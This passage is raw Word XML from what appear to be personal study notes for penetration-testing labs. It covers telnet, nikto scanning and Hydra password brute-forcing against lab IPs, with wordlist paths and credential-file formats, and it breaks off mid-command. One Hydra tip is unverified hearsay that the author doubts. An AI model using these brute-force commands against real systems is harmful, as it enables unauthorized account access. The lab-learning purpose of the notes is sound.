    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001249">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet is ALSO a tool in the command line. The Telnet application is a network debugging tool that allows you to open raw TCP connections to any port on a target system (not just port 23). It's protocol-agnostic and doesn't care what kind of service is running on the port—it just opens a channel for you to send and receive data manually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000124A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the Telnet application to connect to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000124B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP services (port 80):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Send raw HTTP commands like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000124C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP servers (port 25):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Test email sending with commands like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HELO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000124D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom services:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Interact with any TCP-based protocol by typing raw commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000124E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1500"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use case: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's commonly used for testing, debugging, and manually interacting with network services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000124F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wvdihaxkumwt" w:id="151"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikito</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001252">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikito is really helpful for finding vulnerabilities within websites. And it's a really quick one line command so it doesn't hurt to try it. In the Sumo PG Play for example, it told us that it was vulnerable to ShellShock, which we probably wouldn't have been able to see ourselves.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001253">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001254">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nikto -h 192.168.195.87</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001255">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001256">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2641600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="86" name="image97.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image97.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId353"/>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12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8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001259">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_el12rzc7gdhn" w:id="152"/>
      <w:bookmarkEnd w:id="152"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make hydra bruteforce using username and password pairs, use the -u flag. I just saw this from a discord chat, I haven't looked into it but someone said it works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="651"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Don't think this works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want it to go </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">line-by-line (first username and first pass, then second username and second pass and so on) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">instead of trying all combinations, then do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000125F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-C creds.txt</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1260">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then creds.txt should be in this format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001261">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael:pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john:1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001263">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001264">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001265">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RANDOM TIP: To get Hydra to base64 each item in a list, add a 64 after the USER and PASS variables. (^USER64^ and ^PASS64^)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001266">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="600"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can read more in-depth about this in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId354">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Billyboss</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001267">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001268">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to use a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username list</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then use the -L flag instead of -l flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001269">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1251"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P /usr/share/wordlists/rockyou.txt -e nsr ftp://192.168.236.157</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For passwords like for SSH, try this one first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="978"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/seclists/Passwords/500-worst-passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="978"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This was used in the MedTech Challenge Lab since the rockyou.txt took too long</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000126F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The general format is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l &lt;&lt;username&gt;&gt; -P PASSFILE -e </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nsr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;service&gt;://&lt;IP&gt;</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001273">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001274">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001275">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001276">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One important flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001277">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId355">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Stapler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, the "reverse" login name as password ended up being the way into FTP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001278">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l michael  -P /usr/share/wordlists/rockyou.txt -e </w:t>
      </w:r>
